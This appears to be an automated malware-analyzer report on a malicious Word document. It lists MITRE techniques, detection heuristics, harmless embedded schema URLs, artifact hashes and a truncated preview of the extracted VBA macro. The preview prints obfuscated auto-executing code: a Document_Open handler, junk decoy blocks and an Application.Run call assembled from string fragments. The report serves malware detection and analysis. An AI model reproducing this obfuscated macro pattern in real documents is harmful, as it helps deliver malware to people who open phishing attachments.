MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA project with a Document_Open macro. This macro triggers a Shell() call, indicating an attempt to execute arbitrary commands, likely for downloading and running a secondary payload. The presence of VBA macros and the execution of Shell() are strong indicators of malicious intent.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 33249 bytes |
SHA-256: 3c1cf856b0058c7d0d5302e6a1de5e0167418bf254541aa10967a631794fde94 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call nbizvxhrrbsppibwc
End Sub
Private Sub nbizvxhrrbsppibwc()
Dim vxemvbaasddbjsafbhksvfsprrjvjsdrwp As Date
Dim zmwmxfbrayqvmkdhxgduqpapieziudzgwx
Dim riomkrkorxlareqrrcbimgetfsxxzjzovej
If 0 = 23 Then
Else
Dim vidpdddwhdxwhds
Dim rnsvhlnnklhqhcjzgahkohqqcryasozpeyr
Dim mjclofsjrlflwpm As Date
Dim fsykrlfqnldbiz
Dim odokjvayqcutqpfx
Dim nhg
mjclofsjrlflwpm = 15
Do While 992 < 4
Select Case usbncmuybsvmyrzvhnqstoksyztpgn
Case " ¿â梵êËà®�é??ÒÚ¡", "¦¸íö?Áã¼Î®?â�?Åà?»ä", "?Âèñ?¹îÊÙ´?â©?Öç¤Èêð¤´âÃѵ?ï??"
wbtxfrnvrxjm = "©Ëîå?"
Case "?Æìî", "¹éê?Ã"
suffix = "¦Ëãì?ÃßÀÖ©?â§§×ݧÊÜ"
Case "¥´ãò?»òÈÚ«?ò??Æê¦·Ýé?", "?¾çó?±ëÄЮ?"
wbtxfrnvrxjm = "¨ºåæ?°à¼Ü¯?ìª?Ñá¦Áæá?±ðÁ×¢?Ý?§×Ú�º"
Case Else
voyscvmfagfybwvzhqopx = "gxkmtsktniqqtqaavxxfhzgofrynovuuz"
End Select
Dim lbtkanxhpuuk
Dim xhkapnhdgvetjlfvtoarwomrzcluihtm
Dim iowxgmbdvyggelbtagje
Exit Do
Randomize
Loop
Dim pzkazcza As Date
Dim ddzr
Dim nhhhdlisnpgyutqorwqwifccutb
Dim oxrufcejkuvdfey
pzkazcza = 42
Do While 940 < 8
Select Case jbehorqitmqsbdkfebchunsjxuxy
Case "¤¼âæ", "?»Ûâ?¼å½à¨ ñ??ÀÜ£¹êö?»éÎÍ´?â", "?Ãëê?ºÞÌÍ®�ë?£Øá©Äèò¡ÈðÅ"
pejpjizehrygucejfntuctyluatjjhl = "?¶åä?¸ßÇÔ³?ê??Ïã?¹èä?´âÂѦ?ߣ"
Case "³òâ?ÈäÆÜ£?ì??Æç?ÉÜí�ÀÞÉÊ??⣠Ùî?Ç", "?µÛ"
suffix = "§ºòñ?Ãé·ß©?ã?¡Èß ÈÜß?²ê¶Ò±�ã¡?Íê¦Âî"
Case "?Éìã�ÀöÂÊ´?é?ÆÕ?Ëé㤳ã¼Ï", "?¹ìö£"
pejpjizehrygucejfntuctyluatjjhl = "?ÁÛê¢ÄæÆË¥?ì�©×"
Case Else
bwhxnnhtvenizn = "tqmybtooxplptzikc"
End Select
Dim omcriaqrrxdqiwrzmbnbsgcvsmw
Dim kyjxwgxyityjbyijcuuaelthup
Dim qzwemdzyus
Exit Do
Randomize
Loop
Dim plnpxjrbpfwcka As Date
Dim fdklxrbmuuujecv
Dim tvxwbifxcmrzctabpduskqojz
Dim gsircsqwnulkn
plnpxjrbpfwcka = 80
Do While 589 < 4
Select Case ljiaokhawuyynrvkcpvoqusxo
Case "ª¸èá?¾ì»Õ¬?î??È", "¨·âð", "©Åôí?¯çÉγ?í¬?Îì?Áâå?"
izoqkaeyliwdtavmbxzgyhvvxixiri = "§Åèá?Âô¼Ù£?ó��×ê¢"
Case "?ÆÜâ?´íÅÛ¡?ó ?Àê?·ñ磶éÂ", "�Êì餵ô"
suffix = "ª¼à"
Case "?Ãòõ?ÁäÍÕ¥?ß«?ÔÖ?Ãäö?·ìÄË??ó¡", "?½îå�·"
izoqkaeyliwdtavmbxzgyhvvxixiri = "?ÉÞë?·ðËϳ?ç°�"
Case Else
pgrbvu = "vwpdzpjjbcciyrnxdsuftta"
End Select
Dim omwrgegjzfzcipmicdjgoczgja
Dim qbmiumqjlhfrjfivgdkpxqsmtjfpnqigerjy
Dim kvydxvyrxitezf
Exit Do
Randomize
Loop
Dim ylrefusvuedgiddkjqj As Date
Dim mrgpgxyqlcroavjcwhxhgacqblpwlw
Dim ldwnwqbynkjesatlxwrlwsshqlugl
Dim njfcs
ylrefusvuedgiddkjqj = 22
Do While 523 < 5
Select Case fcdiqozukxfe
Case "?ÈòߢÇì¾Õª?ò¨?Æâ¥³Ûó�µÞºÑ¬?ß�?×é?¶â", "¡µÝò?¼ôÂݨ?Û¦¢ÐÛ¨µìô?¿äÉÏ??ë", "?·æö¤ÇÞÄ"
esjes = "¡Êéì?¹ëÂà¡?â??Òà?ºó÷?¾ãÉÕ"
Case "¨¿Þá�Àð¼Õ?é??Ãì?½çè�ÀçÎÞ²", "?¹îí¤À÷·É®?ä£?Èë ÁÛß ¯îÄʦ"
suffix = "¢Äíõ?¾õÌÝ¢?í?£Èã¼ïñ�¯òÂÜ"
Case "¤¶àæ?Æí»Þ", "¥¼Üô?µßÌÛ¥?æ?¥ÂÕ¥Âßé"
esjes = "«¿òõ?ÃßÎÇ´?ê©?ÁÞ?¿ßð?ÁôÁѲ?éª?Âê?"
Case Else
pelqwuirkghgh = "umstzfabvyarjkrwmegbqqkqlo"
End Select
Dim hynyokwelpxpkwmapcsezztyewyccgsr
Dim wlkavjqzumwbniodmiuacwfotsltc
Dim ejdcbpphio
Exit Do
Randomize
Loop
End If
If 9 = 8 Then
Dim rmuvlrljlnhsykumoyv
Else
Dim hjyelxlszrpmhotwgmrevhrun
Dim fjxaibqnzdu As String
fjxaibqnzdu = "AwlHcaYn"
Dim teukgnasclimvbqndwmsepuereraam As String
teukgnasclimvbqndwmsepuereraam = "mEhZIWu"
Dim mflwnzlhe As String
mflwnzlhe = "."
Application.Run fjxaibqnzdu & mflwnzlhe & teukgnasclimvbq
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 70656 bytes |
SHA-256: 9a650cba8a156a70d6b6a337afd76c1c7add66a720e198dae465e4b10cb9729d |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.